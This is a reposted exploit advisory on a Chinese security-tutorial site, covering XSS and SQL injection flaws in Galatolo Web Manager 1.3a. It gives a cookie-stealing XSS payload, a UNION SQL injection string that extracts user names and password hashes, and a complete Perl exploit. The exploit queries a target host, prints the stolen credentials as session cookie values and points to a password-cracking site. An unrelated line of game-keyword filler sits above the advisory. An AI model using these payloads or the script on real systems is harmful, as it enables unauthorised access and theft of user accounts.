• linkedu视频
  • 平面设计
  • 电脑入门
  • 操作系统
  • 办公应用
  • 电脑硬件
  • 动画设计
  • 3D设计
  • 网页设计
  • CAD设计
  • 影音处理
  • 数据库
  • 程序设计
  • 认证考试
  • 信息管理
  • 信息安全
菜单
linkedu.com
  • 网页制作
  • 数据库
  • 程序设计
  • 操作系统
  • CMS教程
  • 游戏攻略
  • 脚本语言
  • 平面设计
  • 软件教程
  • 网络安全
  • 电脑知识
  • 服务器
  • 视频教程
  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链
您的位置:首页 > 网络安全 >Exploit > Galatolo Web Manager 1.3a

Galatolo Web Manager 1.3a

作者:佚名 字体:[增加 减小] 来源:互联网

佚名 向大家分享了Galatolo Web Manager 1.3a ,其中包含弑神1.3a隐藏英雄密码,弑神1.3a,守护10号n楼1.3a攻略,守护10号n楼1.3a地图,弑神1.3a攻略等知识点,遇到此问题的同学们可以参考下
--== ============================================================================ ==--
--== Galatolo Web Manager 1.3a <= XSS / Remote SQL Injection Vulnerability ==--
--== ============================================================================ ==--

[*] Discovered By: StAkeR ~ StAkeR@hotmail.it
[ ] Discovered On: 14 Jul 2008
[ ] Download: http://gwm.dev-area.org/view.php?id=8

[*] Vulnerabilities:

[*] XSS <= 1.3a
[ ] all.php?tag= [Code Javascript]
[ ] http://site.com/all.php?tag=<script>alert(document.cookie)</script>

[*] SQL (plugin users) 1.3a
[ ] plugins/users/index.php?id= [Code SQL]
[ ] -1 union select null,concat(user,0x3a,pass),null,concat(user(),0x3a,database(),0x3a,version()) from users where id=1--

[*] Exploit:

#!/usr/bin/perl
use strict;
use LWP::UserAgent;

my $host = shift;
my ($start,$content,@login);
my $evilxx = "/plugins/users/index.php?id=-1 union select 1,concat(0x25,user,0x25,pass),null,null from users where id=1--";

if($host =~ /^http:\/\/?/i)
{
$start = new LWP::UserAgent or die "[ ] Unable to connect\n";
$start->timeout(1);
$start->agent("Mozilla/4.0 (compatible; Lotus-Notes/5.0; Windows-NT)");
$content = $start->get($host.$evilxx);

if($content->is_success)
{
if($content->content =~ /%(. ?)%([0-9a-f]{32})/)
{
push(@login,$1,$2);
print "[ ] Login:\n";
print "[ ] Username: $login[0]\n";
print "[ ] Password: $login[1]\n\n";

print "[ ] Cookie Session:\n";
print "[ ] gwm_user = $login[0]\n";
print "[ ] gwm_pass = $login[1]\n\n";

print "[ ] Crack Password:\n";
print "[ ] md5(md5(password)) for crack:\n";
print "[ ] http://passcracking.com\n";
}
else
{
print "[ ] Exploit Failed\n";
print "[ ] Site Not Vulnerable\n";
}
}
}
else
{
print "[ ] Galatolo Web Manager (plugin users) 1.3 Remote SQL Injection\n";
print "[ ] Exploit Coded By: StAkeR ~ StAkeR\@hotmail.it\n\n";
print "[ ] Usage: Perl $0 <host>\n";
print "[ ] Usage: Perl $0 http://site.com\n";
}
</div>

您可能想查找下面的文章:

  • Galatolo Web Manager 1.3a
  • Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability

相关文章

  • Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit
  • Maian Cart 1.1 Insecure Cookie Handling Vulnerability
  • VMware Workstation (hcmon.sys 6.0.0.45731) Local DoS Vulnerability
  • Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit
  • Xerox Phaser 8400 (reboot) Remote Denial of Service Exploit
  • Rianxosencabos CMS 0.9 Remote Add Admin Exploit
  • php Help Agent
  • Oracle Internet Directory 10.1.4 Remote Preauth DoS Exploit
  • Maian Guestbook
  • Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability

文章分类

  • 安全教程
  • 安全设置
  • 杀毒防毒
  • 病毒查杀
  • 脚本攻防
  • 入侵防御
  • 工具使用
  • 业界动态
  • Exploit
  • 漏洞分析
  • 加密解密
  • 手机安全
  • 区块链

最近更新的内容

    • 终端技巧 终端机常见绕过沙盘方法
    • Maian Guestbook
    • NoName Script
    • Maian Gallery 2.0 Insecure Cookie Handling Vulnerability
    • Download Accelerator Plus - DAP 8.x m3u File Buffer Overflow Exploit (c)
    • MS Internet Explorer (FTP Server Response) DoS Exploit
    • Galatolo Web Manager 1.3a Insecure Cookie Handling Vulnerability
    • Million Pixels 3 (id_cat) Remote SQL Injection Vulnerability
    • iGaming CMS
    • IntelliTamper 2.0.7 (html parser) Remote Buffer Overflow Exploit

关于我们 - 联系我们 - 免责声明 - 网站地图

©2020-2025 All Rights Reserved. linkedu.com 版权所有